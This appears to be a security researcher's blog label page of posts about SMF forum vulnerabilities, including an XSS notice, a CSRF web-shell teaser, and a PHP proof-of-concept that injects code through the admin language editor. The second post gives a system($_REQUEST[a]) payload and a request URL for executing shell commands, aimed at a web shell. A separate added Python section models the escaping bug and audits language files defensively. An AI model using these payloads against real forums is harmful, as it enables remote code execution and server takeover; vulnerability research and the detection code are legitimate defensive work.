Showing posts with label smf.
Friday, 31 January 2014
In the latest version of SMF I found a tricky XSS vulnerability.
As the vendor said, this is low priority, because it can be exploited
only when an admin user is logged in.
The post will be updated after the patch is released (in the new version).
Thursday, 1 August 2013
[EN] SMF 2.0.4 PHP Injection - part 2
During the last few weeks a lot of you asked me how to add a shell via this PHP injection
vulnerability.
I decided to publish another PoC to show how it can be done (though I believe
a few of you can write better PHP than me ;) )
Anyway, as described here and here, try adding a line like this one as the
'PoC PHP code' value:
---< code >---
en_US\';system($_REQUEST[a]);//
---< code >---
The next step is to request the (modified) language file directly and pass an 'a' parameter
whose value is a shell command :) (The trailing // comments out what is left of the original
line, and $_REQUEST means the command can also arrive in a POST body or a cookie, not only in
the query string.)
Try it:
http://192.168.255.105/smf2.0.4/Themes/default/languages/index.english.php?a=echo%20%27%3Cpre%3E%27;ls%20-la%20;%20echo%20%27%3C/pre%3E%27
From here it is possible to turn this into a working web shell.
Let me know via email or in the comments if you have other ideas about how this attack can be extended. ;)
Cheers!
o/
Labels: 0day, code review, exploit, rce, research, smf, vulnerability
Tuesday, 23 April 2013
[EN] p0c php injection in SMF 2.0.4
Thanks for all the mails about 'how to inject PHP code in the latest SMF'! I'm glad you're reading my blog. ;)
Below is simple proof-of-concept code. Remember to replace the cookie and the path to your SMF installation, and also the session check pair (the ce0361602df1=c6772... field), which SMF's checkSession() verifies against the admin's current session, so it has to be taken from the logged-in admin's form. Otherwise the code will not work. ;)
PoC in PHP:
---8<---
<?php
// Proof of concept that the latest SMF (2.0.4) can be exploited by PHP injection.
// The payload has to escape from the \' that wraps the value, so try something like
// p0c\';phpinfo();// as the 'dictionary' value. Same story for the locale parameter.
// character_set is another story: as far as I remember, that one gives a nice stored XSS. ;)
// 21/04/2013
// http://HauntIT.blogspot.com
// To exploit SMF 2.0.4 we need a valid admin cookie (replace with the real SMFCookie value):
$cookie = 'SMFCookie956=allCookiesHere';
// Admin form for editing the English language pack (replace the host and path):
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);          // keep the response headers in the output
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1);            // submit the form as POST
// In a double-quoted PHP string "\\'" goes out on the wire as \'. The ce0361602df1=... pair is
// SMF's session check (session_var=session_value): copy the current one from the admin's form,
// it is tied to that session and is not reusable.
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  // return the response instead of printing it
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch);                              // release the handle
?>
--->8---
And a pastebin version :)
Remember to test only your own SMF! ;)
o/
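The two posts above describe one bug class from both ends: a setting value that has to "escape from \'" (this PoC) and, once saved, a system($_REQUEST[a]) line that a direct request to the language file turns into a command runner (part 2). The Python below is an added example, not code from the posts and not SMF's own code: it does not reproduce how ManageLanguages.php writes the file, it models the escaping mistake that lets \' close a single-quoted PHP literal, shows the escaped and whitelisted writers beside it, and gives an offline check that scans a language file for assignments with code after the literal. PAYLOAD is the value from the posts; php_single_quoted_end, write_setting_vulnerable, write_setting_hardened, audit_language_file and the SAMPLE_FILE contents are all constructed here.

```python
"""Model of the SMF 2.0.4 language-setting injection, plus a check for it.

Hypothetical code written for this page; it is not from the posts and not
SMF's own ManageLanguages.php. It models the bug class the posts describe:
a setting spliced into a PHP single-quoted literal with escaping that a
value containing \\' defeats, so the rest of the value is parsed as PHP.
"""
import re

# The payload shape from the posts (the Python string holds en_US\';...//).
PAYLOAD = "en_US\\';system($_REQUEST[a]);//"

# Shape of the locale/dictionary/charset settings: identifiers only.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]+$")

# Start of a language-file assignment up to and including the opening quote.
ASSIGN = re.compile(r"^\s*\$txt\['lang_(\w+)'\]\s*=\s*'")


def php_single_quoted_end(src, start):
    """Index of the quote closing the PHP single-quoted literal at src[start].

    Only two escapes exist in such a literal, \\\\ and \\'; any other quote
    terminates it, which is exactly what the injection relies on.
    """
    if src[start] != "'":
        raise ValueError("no literal at offset %d" % start)
    i = start + 1
    while i < len(src):
        if src[i] == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            i += 2                      # escaped backslash or quote: still inside
        elif src[i] == "'":
            return i                    # unescaped quote: the literal ends here
        else:
            i += 1
    raise ValueError("unterminated literal")


def write_setting_vulnerable(key, value):
    """Escapes the quote but not the backslash (model of the mistake).

    A value ending in \\' is stored as \\\\' : PHP reads an escaped backslash
    followed by a real closing quote, and the rest of the value is code.
    """
    return "$txt['lang_%s'] = '%s';" % (key, value.replace("'", "\\'"))


def php_quote(value):
    """Escape for a single-quoted PHP literal: backslash first, then quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def write_setting_escaped_only(key, value):
    """Correct escaping alone: the literal survives, but junk is still stored."""
    return "$txt['lang_%s'] = '%s';" % (key, php_quote(value))


def write_setting_hardened(key, value):
    """Whitelist the value (these settings are identifiers) and escape anyway."""
    if not SAFE_VALUE.match(value):
        raise ValueError("rejected %s value %r" % (key, value))
    return "$txt['lang_%s'] = '%s';" % (key, php_quote(value))


def hardened_rejects(key, value):
    try:
        write_setting_hardened(key, value)
    except ValueError:
        return True
    return False


def audit_language_file(text):
    """Return [(lineno, key, reason)] for suspicious $txt['lang_*'] lines.

    'code after literal' means PHP executes something on that line: that is
    the backdoor. 'value outside whitelist' catches stored junk such as a
    script tag in character_set even when the quoting held.
    """
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ASSIGN.match(line)
        if not m:
            continue
        q = m.end() - 1                 # offset of the opening quote
        try:
            end = php_single_quoted_end(line, q)
        except ValueError:
            findings.append((n, m.group(1), "unterminated literal"))
            continue
        value, rest = line[q + 1:end], line[end + 1:].strip()
        if rest != ";":
            findings.append((n, m.group(1), "code after literal: " + rest))
        elif not SAFE_VALUE.match(value):
            findings.append((n, m.group(1), "value outside whitelist: " + value))
    return findings


# Constructed sample of index.english.php after PAYLOAD went through the
# vulnerable writer (not the real bytes SMF wrote on the author's box).
SAMPLE_FILE = "\n".join([
    "<?php",
    "$txt['lang_character_set'] = 'UTF-8';",
    write_setting_vulnerable("locale", PAYLOAD),
    "$txt['lang_dictionary'] = 'en';",
    "$txt['lang_spelling'] = 'american';",
])

if __name__ == "__main__":
    for lineno, key, reason in audit_language_file(SAMPLE_FILE):
        print("line %d lang_%s: %s" % (lineno, key, reason))
```

To check a real install, feed audit_language_file the contents of every Themes/*/languages/index.*.php; a 'code after literal' hit is a backdoored file, and since the attacker already had admin and file-write access, the whole webroot should be treated as compromised rather than just that one line cleaned.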
Monday, 25 March 2013
[EN] Exploit for latest SMF 2.0.4
Hi.
This week I will publish some new information about vulnerabilities I found.
For example, full technical details about the vulnerable (latest) version, SMF 2.0.4, will be available after contacting the vendor.
*update:*
I see that in some cases there is a possibility to drop a (web)shell via a CSRF attack.
The post will be updated, so...
See you soon! ;)
Monday, 14 January 2013
[EN] SMF 2.0.3 Persistent XSS
For the admin user this time ;)
Details here: http://whk.drawcoders.net/
At this point I would like to thank the whole SMF Team for cooperating.
Fast and responsible team! :)
(Screenshot: Persistent XSS in latest SMF 2.0.3)